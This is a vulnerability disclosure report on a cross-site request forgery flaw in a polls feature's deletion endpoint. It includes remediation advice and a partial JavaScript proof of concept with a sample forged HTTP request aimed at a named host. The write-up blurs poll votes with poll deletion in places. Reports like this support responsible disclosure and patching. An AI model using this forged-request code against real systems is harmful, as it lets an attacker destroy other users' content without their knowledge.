Polls Security Vulnerabilities Reported


Issue #1

Title: Poll Delete Cross-Site Request Forgery
Reported By: Shaun Colley
Severity: Moderate

  1. Description

The tester found that due to absence of anti-XSRF defences on the Poll deletion functionality endpoint, it was possible to carry out cross-site request forgery attacks to delete the entire poll on the victim user's behalf (i.e. the poll creator).

This could be viewed as a relatively low impact issue, but successful exploitation could cause an unintended disruption and could lead to a variety of problems that could affect delivery and/or relations. For example, an important poll may be deleted via XSRF'd by an attacker, leading to a a "no result", slowing down team progress.

Note there was a token named 'atl_token' in the POST request that is used to make poll votes, but setting this value to an obviously invalid value had no effect on the system indeed processing the vote, hence this field is either intended for another purpose other than anti-XSRF protection, or any intended anti-XSRF protected is either disabled or simply doesn't work.

  1. Remediation

Carry out anti-XSRF token validation on all requests that result in a state change.

  1. Proof of Concept

Cross-site request forgery attacks to make poll votes on a 'victim' user's behalf may be carried out using JavaScript similar to the following:

var xhr = new XMLHttpRequest();
xhr.open("POST", 'https://confluence-beta.sd.apple.com/polls/doremovepoll.action', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;

xhr.onreadystatechange = function() {//Call a function when the state changes.
if(xhr.readyState == XMLHttpRequest.DONE && xhr.status == 200) {
// blah blah

Resulting in a request similar to:
POST /polls/doremovepoll.action HTTP/1.1
Host: confluence-beta.sd.apple.com
Connection: keep-alive
Content-Length: 61
Origin: null
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: /
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8